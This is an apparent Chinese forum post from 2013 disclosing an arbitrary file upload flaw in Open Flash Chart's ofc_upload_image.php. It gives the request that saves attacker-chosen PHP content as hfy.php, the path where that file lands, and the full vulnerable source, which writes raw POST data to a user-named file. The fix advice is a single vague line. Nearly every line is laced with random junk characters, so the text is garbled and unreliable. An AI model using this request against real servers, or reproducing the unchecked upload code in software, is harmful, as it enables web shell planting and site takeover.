POST 数据漏洞文件执行任意后缀文件保存
& F: @8 A3 r. Q 漏洞文件/chart/php-ofc-library/ofc_upload_image.php
# k @* _+ x. [! f( W: d6 N0 n' W7 R% b& i
利用:
) J- m7 H, l+ t" W. y) N# W1 ^/chart/php-ofc-library/ofc_upload_image.php?name=hfy.php hfy.php 文件名
, T0 B% O& @8 f& d" r& X! E8 _3 w* g7 U8 r) `! n9 M
Post任意数据
/ E8 Y4 `# w8 `: v保存位置http://localhost/chart/tmp-upload-images/hfy.php
/ a$ z! D' t% z; l4 M; g. O7 B$ A: k* ` k ?" c( [2 C& C/ X9 l( q
c" E9 d- g) a' D
最新版wss漏洞文件,即使是收费版本也有的,在新浪商店部署的demo~; o1 M4 w9 a& d" }7 b
- h- e& i/ t+ Q' C8 H. |2 O
<?php8 j& b3 Q1 d( g# _( A+ K9 v
$ c2 Y8 G+ r+ b: p* ~) O
//
9 [) n% s8 j+ N1 c- E// In Open Flash Chart -> save_image debug mode, you% O% |% g, V9 q0 b$ J+ w% T8 C
// will see the 'echo' text in a new window.' L" l$ o8 G5 K5 I( M9 L
//! c* O! i5 Y) \5 p+ \7 I
5 ]6 E0 [* H* {/*
1 C/ S0 u A; H
/ O$ [5 G+ _; t3 iprint_r( $_GET );2 n+ H* I! S9 x: h& x
print_r( $_POST );
, _( o: z6 [2 L' @print_r( $_FILES );1 `" R3 \8 |% H# c3 O% ?# }2 i
5 x* D! V- f9 q. C
print_r( $GLOBALS );& F4 B5 }5 f0 }( @
print_r( $GLOBALS["HTTP_RAW_POST_DATA"] );
8 e6 i0 F& K% V
" i5 w# |" G2 o" u*/# ^) j+ R& Z/ c+ ?. s- M3 A" [' I
// default path for the image to be stored //
# I2 e s, J7 ]$default_path = '../tmp-upload-images/';6 X( L( y& j+ @
4 {; D9 n5 N! e& ^ y# `$ D, m1 o
if (!file_exists($default_path)) mkdir($default_path, 0777, true);
|8 }+ s5 v Y8 n+ B) e: j; K- X$ o2 K8 s2 d
// full path to the saved image including filename //2 q% g: b) h0 g2 o( \0 K( X
$destination = $default_path . basename( $_GET[ 'name' ] );
( Q" h1 _2 X' r0 a1 k W
4 {. X9 Z+ j6 S0 H& @9 h! gecho 'Saving your image to: '. $destination;
0 D! @% q" E& \5 [$ y// print_r( $_POST );8 w9 Q# a6 k- C% f1 C% H
// print_r( $_SERVER );, }1 R) l# K, q3 u @+ t# |7 ~
// echo $HTTP_RAW_POST_DATA;2 F1 e5 _. d8 B
$ `4 e. N( F0 `; I( S s! W* `- N
//) X/ B! _' n& d* g$ o/ [ J
// POST data is usually string data, but we are passing a RAW .png
6 U9 X# k0 u' R6 Z* n// so PHP is a bit confused and $_POST is empty. But it has saved$ W: u# ^/ w4 r
// the raw bits into $HTTP_RAW_POST_DATA
: L* P) q# k. A' m6 l$ E//
7 n/ i8 [2 x3 H+ I, y5 g' R3 y6 x) t9 Y& ?
$jfh = fopen($destination, 'w') or die("can't open file");
4 A* e; l$ }% z3 h& h( q: ?3 vfwrite($jfh, $HTTP_RAW_POST_DATA);: v) @. Q0 @# i1 J/ X' C' ]6 |0 v
fclose($jfh);0 W7 h: A( V: G* V y5 c
; K: C5 n Z! M# V8 q1 c- {# d
//- K2 `$ O* ], I5 B4 i
// LOOK:/ _6 T2 P( g. [1 G4 m
//6 t3 K% F4 R C6 m5 Y. y. i
exit();
' P6 o: f" D; u' m) M% @. C//0 S. g. E3 g% y% K/ [$ I1 e
// PHP5:
; ]; u- Y' X+ D# c# M. d+ X//
1 _) P9 a3 w; A
. j. ?$ m, ~ D; U5 Z# L6 ^* }7 w& X* F
// default path for the image to be stored //% t" Q# b7 A! s# ?
$default_path = 'tmp-upload-images/';
+ g% ?' d9 G5 F* S4 [$ E( D9 Y3 l9 L4 ~( r. ~8 |: [6 f
if (!file_exists($default_path)) mkdir($default_path, 0777, true);
5 N G& A' N# O2 S( e' Z1 @; R5 ~1 d( y2 D1 ~( {. M$ o* G `: Z
// full path to the saved image including filename //
# w; i! [: [, A! ^8 m2 [$destination = $default_path . basename( $_FILES[ 'Filedata' ][ 'name' ] ); $ D& l7 p8 z0 ^1 v' m
' L3 F9 i. S/ i* H+ H( H
// move the image into the specified directory //2 a) ?" @4 C8 J6 Y( z/ O1 p
if (move_uploaded_file($_FILES[ 'Filedata' ][ 'tmp_name' ], $destination)) { q; {0 s, k9 K8 ]! X
echo "The file " . basename( $_FILES[ 'Filedata' ][ 'name' ] ) . " has been uploaded;";
0 v m+ z/ {% B/ x. n) T} else {7 j3 E r! O& }% n
echo "FILE UPLOAD FAILED";+ [% @9 l6 n; ]0 C
}1 Q0 r$ i' J' C- F8 U; k
4 u9 b# W2 ]; ~% |" M4 f
3 h; C# M, O# [ t2 S! c?>+ q" m; N) t r( x* x, {2 s. {2 k$ v: F
4 w, G0 ~: Z* o9 @# T S; [+ z1 G T' w7 i5 e: x" [7 |. g5 Y7 V
$ Y0 T# Q! w9 ~* ]! q+ G
1 l; Y8 n- E }; a* O
- W; O5 {6 @( w1 _. i6 {/ i3 C- l8 C
修复方案: 2 I! b* Q& u; [; A# P9 N
这个漏洞文件就是个杯具,怎么破,加权限验证,后缀等验证~,自己搞 - ]4 d# y/ m2 A/ T2 X
Y9 q4 C& `: v( z% p
$ \8 k! X! w/ b6 n' e d8 Z3 {. B, l$ W5 }! n+ A4 [
/ x, T3 M3 R2 }7 b2 n& h" M1 i
|
发表于 2013-2-23 12:38:58
收藏
支持
反对